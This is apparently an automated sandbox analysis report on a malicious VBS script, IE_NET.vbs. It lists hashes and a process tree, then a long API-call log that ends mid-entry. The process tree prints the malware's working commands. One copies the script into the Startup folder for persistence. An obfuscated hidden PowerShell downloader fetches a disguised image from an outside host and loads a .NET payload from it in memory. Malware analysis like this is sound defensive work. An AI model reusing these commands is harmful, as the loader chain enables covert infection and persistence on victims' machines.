Summary | ZeroBOX

IE_NET.vbs

Generic Malware Antivirus Hide_URL PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 July 24, 2023, 4:54 p.m. July 24, 2023, 4:56 p.m.
Size 336.3KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 cb32044962932d0d581cd6fdb72d6a3b
SHA256 43fa21c641c82702c42861d7499550b7bc6e514410b11842593202194233326d
CRC32 8B9DF25C
ssdeep 3072:HdBpfzsMxzakOpmPPPPP+yot38nk1/RAPvPPPPPuPPPPPtGmt7RQPbeBQh:HyMxzakhPLh
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\IE_NET.vbs

    2544
    • cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\IE_NET.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ UHB.vbs')"

      2624
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂HM⁂ZQBy⁂HY⁂ZQBy⁂GY⁂d⁂Bw⁂C4⁂bwBu⁂Gw⁂aQBu⁂GU⁂LwBp⁂G0⁂ZwBz⁂C8⁂YgBh⁂HQ⁂XwBu⁂GE⁂d⁂Bp⁂HY⁂ZQ⁂u⁂Go⁂c⁂Bl⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂D⁂⁂LwBR⁂HM⁂Rg⁂1⁂Hg⁂LwBk⁂C8⁂ZQBl⁂C4⁂ZQB0⁂HM⁂YQBw⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

      2936
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'http://serverftp.online/imgs/bat_native.jpeg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('0/QsF5x/d/ee.etsap//:sptth');$method.Invoke($null, $arguments)"

        3048

Name Response Post-Analysis Lookup
serverftp.online 198.12.119.208
IP Address Status Action
164.124.101.2 Active Moloch
198.12.119.208 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleA

buffer: Pinging 127.0.0.1
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: with 32 bytes of data:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping statistics for 127.0.0.1: Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: True
console_handle: 0x00000013
1 1 0

WriteConsoleW

buffer: Exception calling "Invoke" with "2" argument(s): "The type initializer for 'pEe
console_handle: 0x00000027
1 1 0

WriteConsoleW

buffer: JCf5BbK2fNGXjRm.BawL9wsReldGRCsLRg' threw an exception."
console_handle: 0x00000033
1 1 0

WriteConsoleW

buffer: At line:1 char:826
console_handle: 0x0000003f
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'http://serverftp.online/imgs/bat_native.jpeg';$webClient = New-O
console_handle: 0x0000004b
1 1 0

WriteConsoleW

buffer: bject System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$im
console_handle: 0x00000057
1 1 0

WriteConsoleW

buffer: ageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<B
console_handle: 0x00000063
1 1 0

WriteConsoleW

buffer: ASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($st
console_handle: 0x0000006f
1 1 0

WriteConsoleW

buffer: artFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIn
console_handle: 0x0000007b
1 1 0

WriteConsoleW

buffer: dex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex
console_handle: 0x00000087
1 1 0

WriteConsoleW

buffer: - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length)
console_handle: 0x00000093
1 1 0

WriteConsoleW

buffer: ;$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAsse
console_handle: 0x0000009f
1 1 0

WriteConsoleW

buffer: mbly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembl
console_handle: 0x000000ab
1 1 0

WriteConsoleW

buffer: y.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('0/QsF5
console_handle: 0x000000b7
1 1 0

WriteConsoleW

buffer: x/d/ee.etsap//:sptth');$method.Invoke <<<< ($null, $arguments)
console_handle: 0x000000c3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000cf
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000db
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00709a38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a438
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a438
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a438
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a438
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a438
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a438
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00709878
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00709878
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00709878
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0070a4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00642498
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00642e98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00642e98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00642e98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00642558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00642558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00642558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00642558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00642558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00642558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET http://serverftp.online/imgs/bat_native.jpeg
request GET http://serverftp.online/imgs/bat_native.jpeg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 458752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02620000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02650000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x724e1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x724e2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02651000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02652000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0279a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02792000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0279c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
